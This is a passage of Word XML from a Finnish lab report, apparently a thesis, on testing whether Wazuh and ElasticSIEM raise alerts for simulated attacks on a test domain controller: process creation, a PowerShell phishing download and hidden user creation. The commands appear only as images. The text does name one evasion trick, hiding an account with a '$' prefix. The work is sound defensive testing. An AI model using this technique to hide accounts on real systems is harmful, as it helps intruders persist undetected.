        <w:t xml:space="preserve"> Hälytys ja siihen liittyvä kriittisyys määräytyvät mahdollisen poikkeaman vaarallisuude</w:t>
      </w:r>
      <w:r w:rsidR="22E083E6">
        <w:rPr/>
        <w:t>n mukaan. Tässä järjestelmäprosessien muokkaus herättäisi varmasti epäilyksiä SOC-tiimille.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC0EC8" w:rsidP="00EC0EC8" w:rsidRDefault="008F2111" w14:paraId="0BEBFAE0" w14:textId="74E9F67F">
      <w:r>
        <w:t>Ajetaan komennot</w:t>
      </w:r>
      <w:r w:rsidR="001C6789">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">joilla </w:t>
      </w:r>
      <w:r w:rsidR="007E42F6">
        <w:t>luomme uuden prosessin ja käynnistämme sen</w:t>
      </w:r>
      <w:r w:rsidR="00FF2056">
        <w:t xml:space="preserve"> kuvion </w:t>
      </w:r>
      <w:r w:rsidR="00C72B07">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="00FF2056">
        <w:t xml:space="preserve"> mukaisesti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E42F6" w:rsidP="007E42F6" w:rsidRDefault="007E42F6" w14:paraId="60B3E2E1" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007E42F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D336464" wp14:editId="784AFC14">
            <wp:extent cx="6120130" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1379875129" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, ohjelmisto, Multimedia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5129" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, ohjelmisto, Multimediaohjelmisto, Käyttöjärjestelmä&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1866265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00367A9E" w:rsidR="00367A9E" w:rsidP="00D0137A" w:rsidRDefault="007E42F6" w14:paraId="019477C6" w14:textId="7DBC2701">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971538" w:id="59"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidR="005A471F">
        <w:t>Uuden prosessin luonti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C6789" w:rsidP="001C6789" w:rsidRDefault="005A471F" w14:paraId="54B88E45" w14:textId="1BDB22E6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="001C6789">
        <w:t xml:space="preserve">ästä syntyy </w:t>
      </w:r>
      <w:r w:rsidR="002B0A95">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="001C6789">
        <w:t xml:space="preserve">azuhiin </w:t>
      </w:r>
      <w:r w:rsidR="002B0A95">
        <w:t>hälytys,</w:t>
      </w:r>
      <w:r w:rsidR="008860F2">
        <w:t xml:space="preserve"> joka viestii uuden prosessin luonnista</w:t>
      </w:r>
      <w:r w:rsidR="00367A9E">
        <w:t xml:space="preserve">. (Kuvio </w:t>
      </w:r>
      <w:r w:rsidR="00630988">
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00367A9E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B0A95" w:rsidP="002B0A95" w:rsidRDefault="00367A9E" w14:paraId="4ED4714E" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00367A9E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16B02BAA" wp14:editId="380B113A">
            <wp:extent cx="4851383" cy="1796995"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1260869073" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, ohjelmisto, kuvakaappaus,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69073" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, ohjelmisto, kuvakaappaus, numero&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890739" cy="1811573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="002B0A95" w:rsidR="002B0A95" w:rsidP="005A471F" w:rsidRDefault="002B0A95" w14:paraId="0B925253" w14:textId="03552EEB">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971539" w:id="60"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidR="005A471F">
        <w:t>Hälytys uuden prosessin luonnista</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C4061" w:rsidP="261F289F" w:rsidRDefault="001C4061" w14:paraId="033E3559" w14:textId="6E1E86F1">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1430395791" w:id="1852447104"/>
      <w:r w:rsidR="007269EE">
        <w:rPr/>
        <w:t>ElasticSIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1852447104"/>
    </w:p>
    <w:p w:rsidR="001C4061" w:rsidP="00C47CED" w:rsidRDefault="00E76411" w14:paraId="5642E99D" w14:textId="47B80711">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc955080968" w:id="273478798"/>
      <w:r w:rsidRPr="261F289F" w:rsidR="00E76411">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kalastelu: </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="007C6A1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Haitallinen liite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273478798"/>
    </w:p>
    <w:p w:rsidR="00715BD1" w:rsidP="00715BD1" w:rsidRDefault="00715BD1" w14:paraId="3F837A85" w14:textId="6574E2C6">
      <w:r w:rsidR="00715BD1">
        <w:rPr/>
        <w:t xml:space="preserve">Simuloidaan </w:t>
      </w:r>
      <w:r w:rsidR="00701BED">
        <w:rPr/>
        <w:t>tapausta,</w:t>
      </w:r>
      <w:r w:rsidR="008C70EE">
        <w:rPr/>
        <w:t xml:space="preserve"> kun hyökkääjä </w:t>
      </w:r>
      <w:r w:rsidR="00267651">
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00267651">
        <w:rPr/>
        <w:t xml:space="preserve"> lähettänyt </w:t>
      </w:r>
      <w:r w:rsidR="00D0137A">
        <w:rPr/>
        <w:t>kalasteluviestin,</w:t>
      </w:r>
      <w:r w:rsidR="00267651">
        <w:rPr/>
        <w:t xml:space="preserve"> jonka haitallista liitetiedostoa käyttäjä klikkaa</w:t>
      </w:r>
      <w:r w:rsidR="007A5B47">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="2EF04850">
        <w:rPr/>
        <w:t xml:space="preserve"> Haittaohjelman SIEM voi havaita lokitietojen, </w:t>
      </w:r>
      <w:r w:rsidR="359D2582">
        <w:rPr/>
        <w:t xml:space="preserve">erikoisen verkkoliikenteen tai muuten, epäilyttävän käytöksen </w:t>
      </w:r>
      <w:r w:rsidR="359D2582">
        <w:rPr/>
        <w:t>johdosta</w:t>
      </w:r>
      <w:r w:rsidR="359D2582">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="1DBDFACE">
        <w:rPr/>
        <w:t xml:space="preserve">Komponenttien, kuten </w:t>
      </w:r>
      <w:r w:rsidR="6306449F">
        <w:rPr/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="1DBDFACE">
        <w:rPr/>
        <w:t>owershellin</w:t>
      </w:r>
      <w:r w:rsidR="1DBDFACE">
        <w:rPr/>
        <w:t xml:space="preserve"> komennot, jotka muokkaavat järjestelmää aiheuttavat hälytyksiä.</w:t>
      </w:r>
      <w:r w:rsidR="01EE4AED">
        <w:rPr/>
        <w:t xml:space="preserve"> Näin SIEM-työkalun tulisi havaita haittaohjelman lataaminen ja sen asentamisen päätelaitteelle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3E82" w:rsidP="00715BD1" w:rsidRDefault="005A471F" w14:paraId="0FC88D96" w14:textId="683FF800">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="007A3E82">
        <w:t xml:space="preserve">jetaan DC01:llä komennot kuvion </w:t>
      </w:r>
      <w:r w:rsidR="00630988">
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="007A3E82">
        <w:t xml:space="preserve"> mukaan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941CCC" w:rsidP="00941CCC" w:rsidRDefault="00941CCC" w14:paraId="159C1FE5" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00941CCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5221640E" wp14:editId="2077D0FA">
            <wp:extent cx="6120130" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1739664551" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, Sähkönsininen&#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64551" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, Sähkönsininen&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00267651" w:rsidR="007A3E82" w:rsidP="00941CCC" w:rsidRDefault="00941CCC" w14:paraId="5075701D" w14:textId="2FC98270">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971540" w:id="63"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidR="00AC4B68">
        <w:t>Kalastelulinkin simulointi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048287D" w:rsidRDefault="0048287D" w14:paraId="72AD8FED" w14:textId="080DBE92">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007269EE" w:rsidP="007269EE" w:rsidRDefault="0048287D" w14:paraId="4A5FEA91" w14:textId="42E3C32F">
      <w:r>
        <w:t>Tämä aiheuttaa S</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B68">
        <w:t>IEM</w:t>
      </w:r>
      <w:r w:rsidR="000938B7">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>järjestelmään hälytyksiä</w:t>
      </w:r>
      <w:r w:rsidR="00701BED">
        <w:t>. (Kuvio 24)</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B68">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE62E0" w:rsidP="00DE62E0" w:rsidRDefault="009072A9" w14:paraId="4F95A14A" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="009072A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5013500D" wp14:editId="154B3D92">
            <wp:extent cx="6120130" cy="584835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="48140280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02809" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="584835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048287D" w:rsidP="00DE62E0" w:rsidRDefault="00DE62E0" w14:paraId="78B69B43" w14:textId="641D0899">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971541" w:id="64"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidR="00AC4B68">
        <w:t>Kalastelu</w:t>
      </w:r>
      <w:r w:rsidR="00C041BF">
        <w:t>liitteen avaamisesta syntyvä hälytys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00267651" w:rsidR="00DF3EE1" w:rsidP="007269EE" w:rsidRDefault="00DF3EE1" w14:paraId="0B5B2C3C" w14:textId="314A45FB">
      <w:r w:rsidR="00DF3EE1">
        <w:rPr/>
        <w:t xml:space="preserve">Kun hälytystä tarkastelee </w:t>
      </w:r>
      <w:r w:rsidR="00DE62E0">
        <w:rPr/>
        <w:t>tarkemmin,</w:t>
      </w:r>
      <w:r w:rsidR="00DF3EE1">
        <w:rPr/>
        <w:t xml:space="preserve"> näkyy siellä esimerkiksi </w:t>
      </w:r>
      <w:r w:rsidR="0094136D">
        <w:rPr/>
        <w:t>millä yhteys on avattu eli powershell.exe ja mihin: raw.github</w:t>
      </w:r>
      <w:r w:rsidR="00221D42">
        <w:rPr/>
        <w:t>usercontent.com</w:t>
      </w:r>
      <w:r w:rsidR="00250D79">
        <w:rPr/>
        <w:t>. (Kuvio 25)</w:t>
      </w:r>
      <w:r w:rsidR="00C041BF">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE62E0" w:rsidP="00DE62E0" w:rsidRDefault="11AFC6AC" w14:paraId="6540BF1E" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E4D355" wp14:editId="337E4B19">
            <wp:extent cx="5776623" cy="3970867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170704515" name="Picture 17070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78274" cy="3972002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BD035E" w:rsidR="00BD035E" w:rsidP="00750054" w:rsidRDefault="00DE62E0" w14:paraId="57B38525" w14:textId="6B3523AA">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971542" w:id="65"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidR="00C041BF">
        <w:t xml:space="preserve">Lisätietoja </w:t>
      </w:r>
      <w:r w:rsidR="00750054">
        <w:t>kalasteluhälytyksestä</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD035E" w:rsidP="00C47CED" w:rsidRDefault="00BD035E" w14:paraId="3A062B53" w14:textId="6AA04A6D">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc919834941" w:id="1907519406"/>
      <w:r w:rsidR="00BD035E">
        <w:rPr/>
        <w:t>Artefaktien piilottaminen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1907519406"/>
    </w:p>
    <w:p w:rsidR="00006470" w:rsidP="00006470" w:rsidRDefault="00006470" w14:paraId="4C1EFDD2" w14:textId="2820BDD8">
      <w:r w:rsidR="00006470">
        <w:rPr/>
        <w:t xml:space="preserve">Hyökkääjä saattaa haluta luoda </w:t>
      </w:r>
      <w:r w:rsidR="0050320F">
        <w:rPr/>
        <w:t>käyttäjän,</w:t>
      </w:r>
      <w:r w:rsidR="00006470">
        <w:rPr/>
        <w:t xml:space="preserve"> joka on piilotettu</w:t>
      </w:r>
      <w:r w:rsidR="00750054">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00006470">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00750054">
        <w:rPr/>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00006470">
        <w:rPr/>
        <w:t>äyttäjän saa piilotetuksi</w:t>
      </w:r>
      <w:r w:rsidR="00297788">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C46771">
        <w:rPr/>
        <w:t>lisäämällä $ merkin käyttäjänimen alkuun.</w:t>
      </w:r>
      <w:r w:rsidR="063AB3BB">
        <w:rPr/>
        <w:t xml:space="preserve"> SIEM havaitsee käyttäjätilien lisäilyn lokitiedoista, joten voidaan ainakin siitä odottaa hälytystä. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A75EB" w:rsidP="00006470" w:rsidRDefault="00AB5EA3" w14:paraId="4D063FBD" w14:textId="09EAEF75">
      <w:r w:rsidR="00AB5EA3">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="293671A7">
        <w:rPr/>
        <w:t xml:space="preserve">jetaan DC01:llä </w:t>
      </w:r>
      <w:r w:rsidR="3083722B">
        <w:rPr/>
        <w:t xml:space="preserve">kuvion </w:t>
      </w:r>
      <w:r w:rsidR="0058175B">
        <w:rPr/>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="3083722B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB5EA3">
        <w:rPr/>
        <w:t>komento</w:t>
      </w:r>
      <w:r w:rsidR="75D59263">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058175B" w:rsidP="0058175B" w:rsidRDefault="004A75EB" w14:paraId="23A886E5" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="004A75EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76412946" wp14:editId="7AD4D0BB">
            <wp:extent cx="5239481" cy="847843"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="968871479"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1479" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5239481" cy="847843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00006470" w:rsidR="00C46771" w:rsidP="0058175B" w:rsidRDefault="0058175B" w14:paraId="76EE20A0" w14:textId="31B08EDD">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971543" w:id="67"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidR="00AB5EA3">
        <w:t>Piilotetun käyttäjän luonti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD035E" w:rsidP="00BD035E" w:rsidRDefault="00D02912" w14:paraId="2514A312" w14:textId="5D6587AE">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D138BB">
        <w:t>ästä aiheutui hälytys</w:t>
      </w:r>
      <w:r w:rsidR="0058175B">
        <w:t>. (Kuvio 27)</w:t>
      </w:r>
      <w:r w:rsidR="00AB5EA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058175B" w:rsidP="0058175B" w:rsidRDefault="00D138BB" w14:paraId="076467B9" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D138BB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B67C9C6" wp14:editId="6FE83E95">
            <wp:extent cx="6120130" cy="413385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="141916468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4683" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="413385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D138BB" w:rsidP="00D02912" w:rsidRDefault="0058175B" w14:paraId="2736A822" w14:textId="775AB10F">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971544" w:id="68"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidR="00AB5EA3">
        <w:t xml:space="preserve"> Hälytys, piilotettu käyttäjä</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D138BB" w:rsidP="00BD035E" w:rsidRDefault="00D138BB" w14:paraId="450BD3A1" w14:textId="5C808EB5">
      <w:r w:rsidR="00D138BB">
        <w:rPr/>
        <w:t xml:space="preserve">Kun </w:t>
      </w:r>
      <w:r w:rsidR="0021673B">
        <w:rPr/>
        <w:t>avaamme</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B86">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB5EA3">
        <w:rPr/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B86">
        <w:rPr/>
        <w:t>lasticin</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B86">
        <w:rPr/>
        <w:t xml:space="preserve"> analysointi työkalun, näkyy siellä muun muassa luotu käyttäjä</w:t>
      </w:r>
      <w:r w:rsidR="00D02912">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="17E33D16">
        <w:rPr/>
        <w:t xml:space="preserve"> Kuvasta näemme myös </w:t>
      </w:r>
      <w:r w:rsidR="17E33D16">
        <w:rPr/>
        <w:t>process.args</w:t>
      </w:r>
      <w:r w:rsidR="17E33D16">
        <w:rPr/>
        <w:t>, eli k</w:t>
      </w:r>
      <w:r w:rsidR="724341DA">
        <w:rPr/>
        <w:t>omennot, joita käyttäjän luomiseen on käytetty. Tästä voidaan nähdä, että on yritetty luoda piilotettua käyttäjää.</w:t>
      </w:r>
      <w:r w:rsidR="00D02912">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D02912">
        <w:rPr/>
        <w:t>(Kuvio 28</w:t>
      </w:r>
      <w:r w:rsidR="00D02912">
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D02912" w:rsidP="00D02912" w:rsidRDefault="00AF21F6" w14:paraId="7DEB7C05" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
